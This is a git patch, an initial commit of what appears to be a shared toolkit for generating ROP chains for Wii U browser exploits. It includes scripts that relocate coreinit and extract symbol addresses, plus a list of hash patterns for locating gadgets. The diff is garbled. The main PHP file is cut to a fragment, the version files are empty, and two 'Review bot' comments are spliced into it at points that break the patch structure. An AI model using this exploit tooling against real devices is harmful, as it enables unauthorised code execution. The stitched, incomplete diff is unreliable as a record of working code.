From 426271972c30ef6a7c786746d680a7d1fbf69794 Mon Sep 17 00:00:00 2001
From: yellows8
Date: Sun, 22 Nov 2015 13:08:09 -0500
Subject: [PATCH] Initial commit.
---
README.md | 6 ++
wiiu_browserhax_common.php | 131 +++++++++++++++++++++++++++++++++++
wiiuhaxx_buildropversions.sh | 3 +
wiiuhaxx_locaterop.sh | 22 ++++++
wiiuhaxx_locaterop_script | 7 ++
wiiuhaxx_rop_sysver_532.php | 17 +++++
wiiuhaxx_rop_sysver_550.php | 17 +++++
7 files changed, 203 insertions(+)
create mode 100644 README.md
create mode 100644 wiiu_browserhax_common.php
create mode 100755 wiiuhaxx_buildropversions.sh
create mode 100755 wiiuhaxx_locaterop.sh
create mode 100644 wiiuhaxx_locaterop_script
create mode 100644 wiiuhaxx_rop_sysver_532.php
create mode 100644 wiiuhaxx_rop_sysver_550.php
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..61ef337
--- /dev/null
+++ b/README.md
@@ -0,0 +1,6 @@
+This is a common codebase for generating ROP-chains/etc for Wii U exploits. This uses addresses auto-located from coreinit. Currently only binary ROP-chains are supported.
+
+You must specify the "sysver={val}" URL parameter for pages using this codebase, for selecting your Wii U system-version:
+* "532": 5.3.2
+* "550": 5.5.0
+
diff --git a/wiiu_browserhax_common.php b/wiiu_browserhax_common.php
new file mode 100644
index 0000000..41da988
--- /dev/null
+++ b/wiiu_browserhax_common.php
@@ -0,0 +1,131 @@
+);
+}
+
+?>
diff --git a/wiiuhaxx_buildropversions.sh b/wiiuhaxx_buildropversions.sh
new file mode 100755
index 0000000..7c6a913
--- /dev/null
+++ b/wiiuhaxx_buildropversions.sh
@@ -0,0 +1,3 @@
+./wiiuhaxx_locaterop.sh $1/v11464 0x0101c400 > wiiuhaxx_rop_sysver_532.php
+./wiiuhaxx_locaterop.sh $1/v15702 0x0101c400 > wiiuhaxx_rop_sysver_550.php
+
diff --git a/wiiuhaxx_locaterop.sh b/wiiuhaxx_locaterop.sh
new file mode 100755
index 0000000..3f92ee7
--- /dev/null
+++ b/wiiuhaxx_locaterop.sh
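Review bot: Both commands in wiiuhaxx_buildropversions.sh use `$1` unquoted and never check that an argument was supplied, so running the script with no argument still invokes `./wiiuhaxx_locaterop.sh /v11464 ...` and the `>` redirects truncate both `wiiuhaxx_rop_sysver_*.php` files with whatever that produces. The file is created mode 100755 but line 1 is the first command rather than a shebang, which also applies to wiiuhaxx_locaterop.sh in the following hunk; without one, which interpreter runs the script depends on the caller, and the `function` keyword used there is not portable to every `/bin/sh`. I would open the file with `#!/usr/bin/env bash`, `set -euo pipefail` and `ospath=${1:?usage: $0 <os-dump-dir>}`, then pass `"$ospath/v11464"` and `"$ospath/v15702"`, so a failing locate run aborts before the second output is overwritten.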
@@ -0,0 +1,22 @@
+ospath=$1
+coreinit_textaddr=$2
+
+powerpc-eabi-objcopy --change-section-address .text=$coreinit_textaddr $ospath/coreinit.elf $ospath/coreinit_reloc.elf
+
+function getcoreinit_symboladdr
+{
+ val=`powerpc-eabi-readelf -a $ospath/coreinit_reloc.elf | grep "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2`
+ echo "$2 = 0x$val;"
+}
+
+echo ""
diff --git a/wiiuhaxx_locaterop_script b/wiiuhaxx_locaterop_script
new file mode 100644
index 0000000..384b67d
--- /dev/null
+++ b/wiiuhaxx_locaterop_script
@@ -0,0 +1,7 @@
+--patterntype=sha256 --patterndata=c87020ec5098d13edd3ee0d0d01313a0a5f0a7937f36c0f5f4e9503165ae33fb --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK12 = "
+--patterntype=sha256 --patterndata=decff3ca875efc1a9c3d0ac7618f3efa3d33ca59bd3fd602a747d3469bd5c000 --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK20 = "
+--patterntype=sha256 --patterndata=5306248821c072a9cf5c71c9469171e17cd2966f66fc7d612ce79cff8d5d124a --patternsha256size=0x34 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNC = "
+--patterntype=sha256 --patterndata=f4e76053a65c571f2b3b8c6c6dde973c95f889bccf0a22eb9649cbc7810c8e98 --patternsha256size=0x2c --addval=0xFFFFFCFC "--plainout=$ROP_CALLR28_POP_R28_TO_R31 = "
+--patterntype=sha256 --patterndata=4741b863adcf742f8928c485a39f3cc8629469d1ddccf9e68c9dd1c25341f091 --patternsha256size=0x20 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R28R29R30R31 = "
+--patterntype=sha256 --patterndata=972973be8074e92b0f10fc5fbbaaef6c28e2905f99007654cd735a5fd69933fc --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R27 = "
+--patterntype=sha256 --patterndata=6f5f11fdc441ddef8f2189cbc9006517c4917fcf6e975cb8cbeb2373bf8e8ca2 --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R24_TO_R31 = "
diff --git a/wiiuhaxx_rop_sysver_532.php b/wiiuhaxx_rop_sysver_532.php
new file mode 100644
index 0000000..e1057dc
--- /dev/null
+++ b/wiiuhaxx_rop_sysver_532.php
@@ -0,0 +1,17 @@
+
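Review bot: getcoreinit_symboladdr prints `$2 = 0x$val;` even when `grep "$1"` matched nothing, so a missing or renamed symbol silently becomes `NAME = 0x;` in the generated PHP instead of failing the build. `grep "$1"` is also an unanchored regex over the whole `readelf -a` output, so `head -n 1` may pick a longer symbol whose name merely contains `$1`; the preceding `powerpc-eabi-objcopy` step is likewise unchecked, `$ospath` is unquoted throughout, and the backticks would read better as `$(...)`. I would write `val=$(powerpc-eabi-readelf -a "$ospath/coreinit_reloc.elf" | grep -w -- "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2)` followed by `[[ -n "$val" ]] || { printf 'symbol %s not found\n' "$1" >&2; exit 1; }`, and start the file with `set -euo pipefail` so an objcopy failure aborts the run. The hunk header announces 22 lines but only 12 are visible here, so the calls to this function and the rest of the generated output appear to have been lost in extraction and are not reviewed.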
diff --git a/wiiuhaxx_rop_sysver_550.php b/wiiuhaxx_rop_sysver_550.php
new file mode 100644
index 0000000..3550a32
--- /dev/null
+++ b/wiiuhaxx_rop_sysver_550.php
@@ -0,0 +1,17 @@
+